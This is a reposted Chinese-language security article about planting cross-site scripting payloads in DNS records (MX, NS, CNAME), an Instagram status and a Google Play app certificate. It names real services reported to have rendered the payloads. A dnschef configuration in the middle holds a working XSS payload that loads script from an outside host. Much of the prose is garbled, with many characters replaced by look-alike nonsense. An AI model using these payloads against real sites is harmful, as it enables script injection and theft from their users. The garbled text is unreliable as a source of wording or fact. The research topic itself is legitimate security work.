作家
登录

我们要在任何可能的地方测试XSS漏洞

作者: 来源: 2017-08-09 17:19:10 阅读 我要评论

在这篇文┞仿中,我预备跟大年夜家评论辩论几种不合的场景,在这些场景中,不合的办事都邑收集各类各样的数据,但它们又无法精确地去处理这些数据。在某些情况下,数据采取的是安然格局存储和传输的,然则因为数据的解析操作以及进一步处理的过程中存在安然问题,将导致无害的字符串变成进击向量。

XSS和DNS

如不雅你在搜刮引擎中搜刮“经由过程DNS实现XSS”(XSS via DNS)的相干话题,你将会看到类似【参考材料一】和【参考材料二】这种介绍如安在TXT记录中传递XSS进击向量的文┞仿。然则为什么没有人推敲过其他类型的记录呢?比如说CNAME或NS之类的。因为如不雅你想把域名作为一个进击向量的话,你还须要创建本身的NS办事器。

也许应用DNSCHEF会是一个好主意。

我应用的阁下名是hack.bo0om.ru(任何阁下名都可以),并且将我的IP设置成了该域名的NS办事器。接下来修改dnschef.ini并完成dnschef的设备,添加下列记录:

  1. [MX]  
  2.  
  3. *.xss.hack.bo0om.ru="-->'><script/src=//bo0om.ru/xss.js> 
  4.  
  5. [NS]  
  6.  
  7. *.xss.hack.bo0om.ru="-->'><script/src=//bo0om.ru/xss.js> 
  8.  
  9. [CNAME] 
  10.  
  11. *.xss.hack.bo0om.ru="-->'><script/src=//bo0om.ru/xss.js> 

如不雅某个在线办事获得了DNS数据之后还将它们打印在了屏幕上,只能解释该办事忘记过滤掉履┞封些数据了。

下面是一些存在XSS马脚的例子:

  1. ·        who.is 
  2.  
  3. ·        robtex.com 
  4.  
  5. ·        dnsqueries.com 
  6.  
  7. ·        etc 

有一次我只是为了好玩,然后将一段XSS Payload添加到了我Instagram的小我状况中。一开端没产生什么竽暌剐趣的事,并且这个XSS Payload也是没有进击性的。

然则之后我发明,这个XSS Payload竟然在别的的域名和在线办事中起感化了,大年夜我的Web办事器日记记录来看,这些域名貌似指向的是社交收集解析器和一些分析办事。下面给出的是个中部分示例:

  1. ·        findgram.me 
  2.  
  3. ·        imgrab.com 
  4.  
  5. ·        instagy.com 
  6.  
  7. ·        iconosquare.com 
  8.  
  9. ·        tofo.me 
  10.  
  11. ·        photo.sh 
  12.  
  13. ·        gramosphere.com 

不过个中有一部分已经修复了这个马脚。

XSS和Google Play

比来,@Black2Fan给我发了一条信息,并问我能不克不及够在Google Play应用市廛上传存在XSS马脚的Android App。我当时都不知道竟然还有这种操作!但我感到可行。于是我本身弄了一个App,然后为这个App生成了一个证书,并将个中的开辟者名称和其他数据用XSS向量进行了调换。

XSS和Google Play


  推荐阅读

  信息化、移动化、数字化赋能企业提升智慧化管理

1. MCM让发卖全身心投入营业晃荡和售点治理 CIO须要肩负制订公司信息化计谋、引领信息化实践的任务,如没有好奇心,不克不及时刻洞察瞬息万变的新模式、新技巧、新科技、新实践,就无法为企>>>详细阅读


本文标题:我们要在任何可能的地方测试XSS漏洞

地址:http://www.17bianji.com/lsqh/36629.html

关键词: 探索发现

乐购科技部分新闻及文章转载自互联网,供读者交流和学习,若有涉及作者版权等问题请及时与我们联系,以便更正、删除或按规定办理。感谢所有提供资讯的网站,欢迎各类媒体与乐购科技进行文章共享合作。

网友点评
自媒体专栏

评论

热度

精彩导读
栏目ID=71的表不存在(操作类型=0)